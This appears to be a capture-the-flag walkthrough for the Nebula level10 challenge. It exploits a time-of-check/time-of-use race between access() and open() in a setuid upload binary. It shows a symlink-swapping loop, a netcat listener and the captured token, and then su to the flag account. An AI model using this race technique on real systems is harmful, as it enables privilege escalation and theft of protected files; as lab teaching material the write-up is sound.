The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.Source code:
This program's purpose is to send a file to the specified host, if you have read access to the file. The access check however, is implemented poorly. The access man page warns us that there might exist a race condition if the above check is implemented:
Warning: Using access() to check if a user is authorized to, for example, open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call open(2).)We need to read the ~flag10/token. In order to successfully exploit the flag10 binary, we will make it check the access of a symbolic link which is continuously changing from a legit file to ~flag10/token, in the hope that it will change from the legit file to the actual token file during the time between the access() system call and the open() system call.
level10@nebula:~$ while true; do ln -sf /dev/null token; ln -sf ~flag10/token token; done &  11039 level10@nebula:~$ nc.traditional -l -p 18211 > loot & # traditional netcat FTW!  14719 level10@nebula:~$ ~flag10/flag10 token 127.0.0.1 You don't have access to token level10@nebula:~$ ~flag10/flag10 token 127.0.0.1 You don't have access to token level10@nebula:~$ ~flag10/flag10 token 127.0.0.1 Connecting to 127.0.0.1:18211 .. Connected! Sending file .. wrote file! + Done nc.traditional -l -p 18211 > loot level10@nebula:~$ kill -9 11039 # cleanup level10@nebula:~$ cat fl .oO Oo. 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 + Killed while true; do ln -sf /dev/null token; ln -sf ~flag10/token token; doneNow go ahead and get the flag :)
level10@nebula:~$ su flag10 -c getflag Password: You have successfully executed getflag on a target account